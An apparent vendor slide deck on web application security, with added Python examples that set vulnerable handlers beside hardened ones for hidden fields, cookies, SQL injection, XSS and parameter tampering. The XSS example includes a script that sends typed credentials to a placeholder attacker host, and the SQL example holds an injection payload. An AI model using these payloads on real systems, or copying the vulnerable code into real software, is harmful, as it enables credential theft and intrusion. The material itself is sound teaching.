The document provides an overview of web application security. It discusses what web application security entails, which is achieving an acceptable level of security for a web application solution. It explains why web application security is important given increased reliance on web apps and their global accessibility. It outlines some common security risks like browser hijacking, cookie theft, and denial of service attacks. It also discusses how security problems should be addressed earlier in the development lifecycle to reduce costs. The document then delves into specific vulnerabilities like hidden field manipulation, cookie poisoning, buffer overflows, and cross-site scripting attacks. Examples are provided to illustrate how attackers can exploit these vulnerabilities.
2. What is Web Application Security?
Web Applications exist in many forms. Some search, some count, others even transfer money within your bank accounts. Web Applications are employed to carry out many mission-critical tasks and if anything is certain, our reliance upon web applications will continue to grow.
So, simply put, Web Application Security is the achievement of an acceptable level of security assurance of a web application solution.
Security Assurance = CIA (Confidentiality, Integrity, Availability)
3. Why is web application security important?
Before software functionality was capable of being delivered via the web, software developers' security concerns were relative to network and OS level threats, given that their user base was limited to internal or WAN networks. All this has now changed. Web developers now create software that runs on web servers accessed by anyone, anywhere. The scope and magnitude of their software delivery has increased exponentially and, in so doing, security issues have also risen that are now web-centric and totally bypass the legacy network and OS based defensive strategy:
- Browser Hi-Jacking
- Cookie Theft
- Server & Client Compromise
- Denial of Service
- Abuse
- User Privacy Invasion
4. Pay Me Now Or Pay Me Later
Security problems are found in the Design, Build and Deployment/Maintenance phases of the application lifecycle. A problem identified in any phase after the initial build may cause the code to go back to the design stage to be addressed, and then to pass through the necessary development phases again. This obviously adds time, cost and resource conflicts to the entire development process. It is well known that fixing a problem found in the Testing phase is about 2-5 times more expensive than fixing it in the coding phase, and fixing a problem found in the Maintenance (deployment and beyond) phase is 5-7 times more expensive than fixing it in the coding phase.
5. What Is The Ultimate Cost For Not Addressing
Security Early?
6. The Fourth Level of Web Security
Level | Layer | Security | Behavior (threat)
1 | Desktop | Antivirus | Disruption
2 | Transport | Encryption | Interception
3 | Network | Firewall | Illegal Access
4 | Web Applications | Manual Patching | Web Perversion
7. Digital Security Landscape
Desktop: Antivirus Protection
Transport: Encryption (SSL)
Network: Firewalls/Advanced Routers
Web Applications: Manual Patching and Code Review
8. What is a Web Application
The business logic that enables:
- User's interaction with the Web site
- Transacting/interfacing with back-end data systems (databases, CRM, ERP etc)
In the form of:
- 3rd party packaged software; i.e. web server, shopping cart software, personalization engines etc.
- Code developed in-house / web builder / system integrator
Input and Output flow through each layer of the application; a break in any layer breaks the whole application:
User Input -> Browser -> HTML/HTTP -> Web Server -> User Interface Code -> Front end Application -> Backend Application -> Database -> Data
10. Web Manipulation Examples
Through a browser, a hacker can use even the smallest bug or backdoor to change, or distort, the intent of the application.
Application | Attack | Objective
Form field: collect data | Buffer overflow | Crash servers/close business
Online shopping | Hidden fields | eShoplifting
Sloppy code | Debug options | Download proprietary database
Text field: collect data | Cross Site Scripting | eHijacking - get account info
Customer account | Cookie poisoning | Identity theft
11. The results of over 300 AppAudits conducted with AppScan: 97% of Sites Are Vulnerable
[Chart: breakdown of findings by vulnerability type; the category labels did not survive extraction]
12. The Web's 7 Deadly Sins
- Hidden Field Manipulation
- Cookie Poisoning
- Application Buffer Overflow
- Third-Party Misconfiguration
- Cross-Site Server Scripting
- Parameter Tampering
- SQL Injection
13. Hidden Field Manipulation
Vulnerability explanation:
The application sends data to the client using a hidden field in a form. Modifying the hidden field corrupts the data returned to the web application.
Why Hidden Field Manipulation:
Passing hidden fields is a simple and efficient way to pass information from one part of the application to another (or between two applications) without the use of complex backend systems.
As a result of this manipulation:
The application acts according to the changed information and not according to the original data.
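The "eShoplifting" case from the examples table, as an added illustration that is not part of the original slides: a checkout that multiplies a hidden `price` field sent back by the browser, beside one that ignores the client's copy and re-derives the price from a server-side catalog. The catalog, the SKUs, the form bodies and the helper names are constructed for this example.

```python
"""Hidden-field manipulation: trusting a client-returned price vs. re-deriving it.

Added example, not from the original slides. CATALOG and the POST bodies
are constructed; a real site would look prices up in its database."""
from decimal import Decimal
from urllib.parse import parse_qs

# Constructed server-side catalog: the only authoritative source of prices.
CATALOG = {
    "SKU-100": Decimal("49.99"),
    "SKU-200": Decimal("199.00"),
}


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded POST body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def checkout_vulnerable(body: str) -> Decimal:
    """Trusts the hidden 'price' field the browser sent back.
    Anyone can edit the saved HTML, or replay the POST, with a different price."""
    form = parse_form(body)
    qty = int(form["qty"])
    price = Decimal(form["price"])          # attacker-controlled value
    return price * qty


def checkout_hardened(body: str) -> Decimal:
    """Ignores any client-supplied price and looks it up by SKU.
    Hidden fields may carry state, but never values the server already knows."""
    form = parse_form(body)
    sku = form["sku"]
    if sku not in CATALOG:
        raise ValueError(f"unknown sku {sku!r}")
    qty = int(form["qty"])
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return CATALOG[sku] * qty


def hardened_rejects(body: str) -> bool:
    """True if the hardened handler refuses the request."""
    try:
        checkout_hardened(body)
    except (ValueError, KeyError):
        return True
    return False


# Constructed request bodies: what the page's own form sends, and a copy in
# which the hidden price was edited before submission.
HONEST_POST = "sku=SKU-200&qty=1&price=199.00"
TAMPERED_POST = "sku=SKU-200&qty=1&price=0.01"
BOGUS_SKU_POST = "sku=SKU-999&qty=1&price=199.00"

if __name__ == "__main__":
    print("vulnerable, tampered:", checkout_vulnerable(TAMPERED_POST))   # 0.01
    print("hardened,   tampered:", checkout_hardened(TAMPERED_POST))     # 199.00
```

If a hidden field must carry a server-computed value (a discount already granted, a step in a wizard), sign it with a server key or keep it in the server-side session; either way the server validates before acting, which is the whole point of the slide.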
18. Cookie Poisoning
Vulnerability explanation:
The session information contained within the cookie is changed to a different value, causing the application to switch to the new session ID.
Why Cookie Poisoning:
Some session IDs are not secure, e.g. not encrypted, or weakly encrypted or hashed. This is generally due to a lack of cryptographic expertise on the part of developers.
As a result of this manipulation:
Hackers can assume the user's identity and have access to that user's information: identity theft/impersonation.
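The two halves of this slide side by side, as an added example that is not part of the original deck: a cookie that merely encodes the user name (so "poisoning" it is a decode, edit, re-encode), beside a session cookie built from a random identifier that is stored on the server and protected by an HMAC. The key, user names and session store are constructed for the example.

```python
"""Cookie poisoning: identity-in-the-cookie vs. random, server-stored, MAC-protected id.

Added example, not from the original slides. SERVER_KEY and the users are
constructed; in production the key comes from a secret store."""
import base64
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# ---- Weak scheme: the cookie is the identity, only obscured ----------------

def weak_cookie(username: str) -> str:
    """Base64 is an encoding, not encryption: anyone can decode and re-encode it."""
    return base64.b64encode(f"user={username}".encode()).decode()


def weak_resolve(cookie: str) -> str:
    """The server believes whatever name the cookie carries."""
    return base64.b64decode(cookie).decode().split("=", 1)[1]


def poison_weak_cookie(victim: str) -> str:
    """Attacker's move: decode their own cookie, swap in the victim's name, re-encode."""
    return weak_cookie(victim)


# ---- Hardened scheme: random id, server-side lookup, HMAC over the id ------

SERVER_KEY = secrets.token_bytes(32)        # constructed per run for the example
_SESSIONS: Dict[str, str] = {}              # session id -> username, never sent to the client


def _tag(session_id: str) -> str:
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def create_session(username: str) -> str:
    """128 bits of randomness: unguessable, and there is nothing in it to decode."""
    session_id = secrets.token_urlsafe(16)
    _SESSIONS[session_id] = username
    return f"{session_id}.{_tag(session_id)}"


def resolve_session(cookie: str) -> Optional[str]:
    """Constant-time tag check, then a server-side lookup; None for anything altered."""
    session_id, sep, tag = cookie.partition(".")
    if not sep or not hmac.compare_digest(tag, _tag(session_id)):
        return None
    return _SESSIONS.get(session_id)


def poison_hardened_cookie(own_cookie: str, guessed_id: str) -> str:
    """Attacker keeps their own tag and substitutes a guessed id; the tag no longer matches."""
    _, _, tag = own_cookie.partition(".")
    return f"{guessed_id}.{tag}"


if __name__ == "__main__":
    print("weak   :", weak_resolve(poison_weak_cookie("admin")))        # admin
    bob = create_session("bob")
    print("honest :", resolve_session(bob))                             # bob
    print("forged :", resolve_session(poison_hardened_cookie(bob, "AAAAAAAAAAAAAAAAAAAAAA")))  # None
```

The slide frames the fix as encryption, but the properties that actually stop poisoning are unpredictability (an attacker cannot produce another user's id) and integrity (an edited cookie is detected). An encrypted `user=alice` token without either of those is still a bearer token that can be copied or swapped.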
23. Backdoor & Debug Options
Vulnerability explanation:
The application has hidden debug options that can be activated by sending a specific parameter or sequence.
Why Backdoor and Debug options:
1. Leaving debug options in the code enables developers to find and fix bugs faster
2. Developers leave backdoors as a way of guaranteeing their access to the system
As a result of this manipulation:
Activation of the hidden debug option gives the hacker far greater access to the application than a normal user (usually unlimited).
27. Application Buffer Overflow
Vulnerability explanation:
Exploiting a flaw in a form to overload the server with excess input: sending more characters than the application expects causes it to misbehave.
Why Application Buffer Overflow:
The application does not check the number of characters it receives.
As a result of this manipulation:
The application crashes and in many cases causes the whole site to shut down (DoS). In other cases, the application executes the code received as the input.
33. Stealth Commanding
Vulnerability explanation:
Concealing dangerous commands inside otherwise ordinary input (a Trojan horse) with the intent to run malicious or unauthorized code that is damaging to the site.
Why Stealth Commanding:
Applications tend to use the content received from a field to build and evaluate a new command. However, they assume that the content is only data and not executable code.
As a result of this manipulation:
The hacker can perform any command on the web server, including complete shut down, defacement, or access to all information.
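The flaw described here, field content that ends up evaluated as part of a command, is the same one listed as "SQL Injection" among the seven deadly sins, so one added example serves both; it is not from the original slides. It is shown against an in-memory SQLite table because that runs offline; an OS command assembled by string concatenation and handed to a shell fails in exactly the same way. The table, rows and payload are constructed.

```python
"""Stealth commanding shown as SQL injection: input evaluated as command syntax.

Added example, not from the original slides. The accounts table and the
payload are constructed for illustration."""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed accounts table standing in for the site's back-end database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("alice", "s3cret", 1200), ("bob", "hunter2", 75)],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, int]]:
    """String concatenation: the form field becomes part of the SQL text, so a
    quote in the input ends the literal and the rest is parsed as a command."""
    sql = (
        "SELECT username, balance FROM accounts WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, int]]:
    """Bound parameters: the driver passes the values separately from the
    command, so quotes in the input remain data. (A real site would also
    store password hashes rather than compare plaintext.)"""
    sql = "SELECT username, balance FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Constructed payload typed into the password box: closes the string literal
# and appends a clause that is always true, so every row matches.
PAYLOAD = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "alice", PAYLOAD),   # both rows
        "hardened": login_hardened(conn, "alice", PAYLOAD),       # no rows
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:10}: {rows}")
```

The same separation of command from data is what `subprocess.run(["ping", host])` with an argument list gives for OS commands: the host is never re-parsed by a shell, so metacharacters in it cannot chain a second command. A shell string built by concatenation has no such boundary.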
36. Known Vulnerabilities
Vulnerability explanation:
Some technologies used in sites have inherent weaknesses that a persistent hacker, or a hacker with automated scanning tools, can exploit easily. Users are dependent on patches from the vendor. Once a weakness is discovered in one site it can be used against all the sites using the same component.
Why Known Vulnerabilities:
Third party vendors have bugs (Microsoft IIS etc). Since their products appear in many sites they are examined thoroughly by a large number of hackers.
As a result of this manipulation:
Once a bug is found, large parts of the internet are scanned and exploited. The actual result varies according to the vulnerability type, but the ability to gain the administrator's passwords and take control of the site is not unusual!
38. 3rd Party Misconfigurations
Vulnerability explanation:
A misconfiguration, or human error during the install of 3rd party software, can leave default passwords or settings unchanged: an open invitation for attack.
Why 3rd party misconfigurations:
Occurs during the installation and maintenance of the 3rd party application.
As a result of this manipulation:
Through a configuration error a hacker could create a new database that renders the existing one unusable by the site.
40. Cross Site Scripting
Vulnerability explanation:
A third party creates a link (or sends an email) whose URL contains a parameter with a script; once the user follows it, the site echoes the parameter and the user's browser runs the script in the site's context.
Why Cross Site Scripting:
Many parameters are embedded within the HTML of the following responses without their content being checked for scripts.
As a result of this manipulation:
"Virtual hijacking" of the session. Any information flowing between the legitimate user and the site can be manipulated or transmitted to the evil 3rd party.
41. Cross Site Scripting - Example
1. "Press this link to get to your bank" - underlying link: http://www.mybank.com?a=<evil javascript>
2. "Enter your login information" - the user is shown the bank's login form (Username, Password)
3. The JavaScript program collects and sends the user names and passwords
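The three steps above in code, as an added example that is not part of the original slides: a page that echoes the `a` parameter straight into its HTML, beside the same page with HTML output encoding, exercised with a link in the shape of the slide's `http://www.mybank.com?a=<evil javascript>`. The page template, the login form markup and the script body (which posts the typed credentials to an assumed attacker host) are constructed for the example.

```python
"""Reflected XSS: parameter echoed into HTML verbatim vs. HTML-encoded on output.

Added example, not from the original slides. PAGE, LOGIN_FORM and EVIL_URL
are constructed; 'attacker.example' is a placeholder host."""
import html
from urllib.parse import parse_qs, urlsplit

PAGE = "<html><body><p>Welcome back, {name}.</p>{form}</body></html>"
LOGIN_FORM = (
    '<form method="post" action="/login">'
    'Username <input name="u"> Password <input name="p" type="password">'
    '<input type="submit"></form>'
)


def param_from_url(url: str, key: str) -> str:
    """Pull a query parameter the way a naive handler would."""
    return parse_qs(urlsplit(url).query).get(key, [""])[0]


def render_vulnerable(name: str) -> str:
    """The parameter lands in the HTML untouched, so a <script> in it runs in
    the bank's origin with access to the login form on the same page."""
    return PAGE.format(name=name, form=LOGIN_FORM)


def render_hardened(name: str) -> str:
    """Output encoding for an HTML text context: '<', '>', '&' and quotes
    become entities, so the browser shows the payload as text."""
    return PAGE.format(name=html.escape(name, quote=True), form=LOGIN_FORM)


def contains_script(page: str) -> bool:
    return "<script" in page.lower()


# Constructed phishing link in the shape of the slide's example. The script
# hooks the login form's submit event and leaks username:password to the
# attacker's host via an image request before the real submission proceeds.
EVIL_URL = (
    "http://www.mybank.com/?a=<script>document.forms[0].onsubmit=function(){"
    "new Image().src='http://attacker.example/?'.concat(this.u.value,':',this.p.value)"
    "}</script>"
)

if __name__ == "__main__":
    payload = param_from_url(EVIL_URL, "a")
    print("vulnerable runs script:", contains_script(render_vulnerable(payload)))  # True
    print("hardened runs script  :", contains_script(render_hardened(payload)))    # False
```

Encoding is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a parameter placed inside a `<script>` block or a URL needs the encoding for that context instead.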
42. Parameter Tampering
Vulnerability explanation:
Parameters are used to obtain information from the client. This information can be changed by the client in the site's URL parameters.
Why Parameter Tampering:
Developers focus on the legal values of parameters and how they should be utilized. Little if any attention is given to the incorrect values.
As a result of this manipulation:
The application can perform a function that was not intended by its developer, like giving access to another customer's information.
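One added example, not from the original slides, covering this slide together with the Backdoor & Debug Options and Application Buffer Overflow slides, since the same handler-side discipline addresses all three: a customer-account endpoint that uses `?acct=` at face value and honours a forgotten `?debug=1`, beside one that rejects any parameter not on its allowlist, enforces type and length on the ones it accepts, and checks that the logged-in user owns the record before returning it. The account table, the session, the parameter names and the limits are constructed for the example.

```python
"""Parameter tampering: face-value ?acct= vs. allowlisted, bounded, owner-checked input.

Added example, not from the original slides. ACCOUNTS, SESSION, ALLOWED and
the 'debug' switch are constructed for illustration."""
from typing import Dict
from urllib.parse import parse_qs

# Constructed back-end data and session: who is logged in and what they own.
ACCOUNTS = {
    "1001": {"owner": "alice", "balance": 1200},
    "1002": {"owner": "bob", "balance": 75},
}
SESSION = {"user": "bob"}

# Allowlist for this endpoint: parameter name -> (validator, maximum length).
ALLOWED = {
    "acct": (str.isdigit, 8),
    "page": (str.isdigit, 3),
}


class BadRequest(Exception):
    """Malformed or unexpected input; answer 400 and log it."""


class Forbidden(Exception):
    """Well-formed request for a record the caller does not own."""


def parse(query: str) -> Dict[str, str]:
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def account_vulnerable(query: str) -> dict:
    """Takes ?acct=... at face value: editing 1002 to 1001 in the URL shows
    another customer's data, and a leftover ?debug=1 dumps the whole table."""
    form = parse(query)
    record = ACCOUNTS[form["acct"]]
    if form.get("debug") == "1":                     # leftover debug option
        return {**record, "debug": ACCOUNTS}
    return record


def account_hardened(query: str) -> dict:
    """Unknown parameters are rejected (forgotten debug switches are dead),
    accepted ones are bounded in type and length (oversized input never reaches
    the back end), and ownership is checked before anything is returned."""
    form = parse(query)
    for name, value in form.items():
        if name not in ALLOWED:
            raise BadRequest(f"unexpected parameter {name!r}")
        check, max_len = ALLOWED[name]
        if len(value) > max_len or not check(value):
            raise BadRequest(f"invalid value for {name!r}")
    record = ACCOUNTS.get(form.get("acct", ""))
    if record is None or record["owner"] != SESSION["user"]:
        raise Forbidden("not your account")          # same response as 'not found' in practice
    return record


def hardened_rejects(query: str) -> bool:
    """True if the hardened handler refuses the request."""
    try:
        account_hardened(query)
    except (BadRequest, Forbidden):
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, foreign acct:", account_vulnerable("acct=1001")["owner"])   # alice
    print("hardened,   foreign acct:", hardened_rejects("acct=1001"))              # True
```

Length limits here are not a substitute for memory-safe code in the component that ultimately parses the value, but they keep the "send more characters than expected" case of the buffer-overflow slide from reaching it at all.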
45. Forceful Browsing
Vulnerability explanation:
By "guessing" the names of files and directories the hacker can view them without going through the business logic leading to those objects.
Why forceful browsing:
1. Default files are left during the installation process
2. New files that should not be exposed and old files which should be removed are left (outside the normal flow) by mistake
As a result of this manipulation:
Content (log files, administration facilities, application source code) is revealed through direct file and directory access.
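The server-side view of this attack, as an added example that is not part of the original slides: a detector run over web server access logs that flags a client asking for the kinds of names a guesser tries (default install directories, backups, leftover editor copies, log files). The log lines are constructed in Common Log Format, and the list of suspicious names and the threshold are assumptions to tune per site.

```python
"""Forceful browsing: flag clients guessing file and directory names in access logs.

Added example, not from the original slides. SAMPLE_LOG is constructed; the
SUSPICIOUS pattern and min_hits threshold are assumptions."""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Common Log Format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

# Assumed names that legitimate traffic on this site never asks for.
SUSPICIOUS = re.compile(
    r"(^/admin/|/backup|\.bak$|\.old$|\.orig$|/test\.|/_vti_bin/|/cgi-bin/|\.log$|/\.git/)",
    re.I,
)


def parse_line(line: str) -> Optional[dict]:
    """Fields of one CLF line, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def forceful_browsers(lines: List[str], min_hits: int = 3) -> Dict[str, List[str]]:
    """Return ip -> ['path status', ...] for clients with at least min_hits
    requests for suspicious names. The status is kept so a reviewer can see
    which guesses the server actually answered (a 200 is the one that matters)."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and SUSPICIOUS.search(rec["path"]):
            hits[rec["ip"]].append(f'{rec["path"]} {rec["status"]}')
    return {ip: paths for ip, paths in hits.items() if len(paths) >= min_hits}


# Constructed log excerpt: one normal visitor, one guesser (whose /backup.zip
# guess succeeded), one admin, and a malformed line.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2001:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 4123
10.0.0.5 - - [12/Mar/2001:10:01:05 +0000] "GET /cart.asp?id=7 HTTP/1.1" 200 2210
203.0.113.9 - - [12/Mar/2001:10:02:00 +0000] "GET /admin/ HTTP/1.1" 403 512
203.0.113.9 - - [12/Mar/2001:10:02:01 +0000] "GET /backup.zip HTTP/1.1" 200 88211
203.0.113.9 - - [12/Mar/2001:10:02:01 +0000] "GET /cart.asp.bak HTTP/1.1" 404 512
203.0.113.9 - - [12/Mar/2001:10:02:02 +0000] "GET /_vti_bin/ HTTP/1.1" 404 512
203.0.113.9 - - [12/Mar/2001:10:02:03 +0000] "GET /access.log HTTP/1.1" 404 512
198.51.100.4 - - [12/Mar/2001:10:03:00 +0000] "GET /admin/ HTTP/1.1" 200 900
this line is not in log format
"""


def demo() -> Dict[str, List[str]]:
    return forceful_browsers(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, paths in demo().items():
        print(ip)
        for p in paths:
            print("   ", p)
```

Detection is the second line of defence; the first is the slide's own point, removing default and leftover files and serving only what the application's routes expose, so that a correct guess returns nothing.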
The point of these animated slides is to show that the applications are written to work with the security tools and policies. If you compromise the application (via a browser) you can bypass the security.
Base - the explosion of the WEB in '93 allowed anyone with a browser to access your site.
1st animation - firewalls were put in place to only allow specific port access (i.e. WEB traffic).
2nd animation - with the FW we still have an access problem, so add authentication to only allow WEB access with channel encryption.
3rd animation - the need for e-Business has introduced backend applications driven by WEB browsers. Compromise the application via the browser and you get past the security policies, compromise the applications, and access/manipulate sensitive resources.
4th animation - The same issue still exists. If we have done our job properly then we may have taken care of all of the known attacks, but we still have not addressed the unknown application hack. These are real threats to the site. Click on the "APPLICATION HACKS" to link to the application hacks demo. The demo will return back to this point when completed (you can always hit escape out of the demo ppt to return here).
5th animation - AppShield solves this problem by providing application perimeter defense, front ending any potential threat so that it never reaches the server. A point to make here is that the server will not spend its time processing illegal requests.
If we look at the complexity of the web application, it is multi-layered and includes all the business logic that enables user’s interaction with the web site and the transacting with the back-end data systems sitting behind the site. These applications come in the form of 3rd party packaged software and code developed in-house.
Even in a secure environment, so much has to go right for these layers to behave appropriately that it is amazing these sites work half the time! (NEXT SLIDE)
Also could be an example of 3rd party misconfiguration